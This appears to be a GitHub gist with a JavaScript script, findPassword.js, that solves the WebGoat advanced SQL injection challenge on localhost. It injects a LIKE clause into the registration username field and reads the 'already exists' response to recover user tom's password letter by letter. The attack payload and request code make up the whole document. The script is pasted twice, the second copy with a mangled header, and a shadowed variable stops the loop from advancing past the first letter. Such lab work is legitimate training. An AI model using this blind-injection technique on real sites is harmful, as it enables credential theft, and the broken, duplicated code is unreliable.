hendrixjoseph/findPassword.js

## findPassword.js
let findNextLetter = async function(password) {

    if(!password) {
        password = ""
    }

    for (let letter = 'a'; letter <= 'z'; letter = String.fromCharCode(letter.charCodeAt(0)+1)) {
        let newPassword = password + letter;

        let response = await fetch("http://localhost:8080/WebGoat/SqlInjectionAdvanced/challenge", {
          "headers": {
            "accept": "*/*",
            "accept-language": "en-US,en;q=0.9",
            "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
            "sec-fetch-dest": "empty",
            "sec-fetch-mode": "cors",
            "sec-fetch-site": "same-origin",
            "sec-gpc": "1",
            "x-requested-with": "XMLHttpRequest"
          },
          "referrer": "http://localhost:8080/WebGoat/start.mvc",
          "referrerPolicy": "strict-origin-when-cross-origin",
          "body": `username_reg=tom'+AND+password+like+'${newPassword}%25&email_reg=hendrixjoseph%40aol.com&password_reg=pw&confirm_password_reg=pw`,
          "method": "PUT",
          "mode": "cors",
          "credentials": "include"
        });

        let json = await response.json();

        if (json.feedback.includes('already exists')) {
            return newPassword;
        }
    }
}

let findPassword = async function(size, start) {
    let password = start;

    if(!size) {
        size = 10;
    }

    for (let i = 0; i < size; i = i + 1) {
       let password = await findNextLetter(password);
       console.log(password);
    }
}
	let findNextLetter = async function(password) {

	if(!password) {
	password = ""
	}

	for (let letter = 'a'; letter <= 'z'; letter = String.fromCharCode(letter.charCodeAt(0)+1)) {
	let newPassword = password + letter;

	let response = await fetch("http://localhost:8080/WebGoat/SqlInjectionAdvanced/challenge", {
	"headers": {
	"accept": "/",
	"accept-language": "en-US,en;q=0.9",
	"content-type": "application/x-www-form-urlencoded; charset=UTF-8",
	"sec-fetch-dest": "empty",
	"sec-fetch-mode": "cors",
	"sec-fetch-site": "same-origin",
	"sec-gpc": "1",
	"x-requested-with": "XMLHttpRequest"
	},
	"referrer": "http://localhost:8080/WebGoat/start.mvc",
	"referrerPolicy": "strict-origin-when-cross-origin",
	"body": `username_reg=tom'+AND+password+like+'${newPassword}%25&email_reg=hendrixjoseph%40aol.com&password_reg=pw&confirm_password_reg=pw`,
	"method": "PUT",
	"mode": "cors",
	"credentials": "include"
	});

	let json = await response.json();

	if (json.feedback.includes('already exists')) {
	return newPassword;
	}
	}
	}

	let findPassword = async function(size, start) {
	let password = start;

	if(!size) {
	size = 10;
	}

	for (let i = 0; i < size; i = i + 1) {
	let password = await findNextLetter(password);
	console.log(password);
	}
	}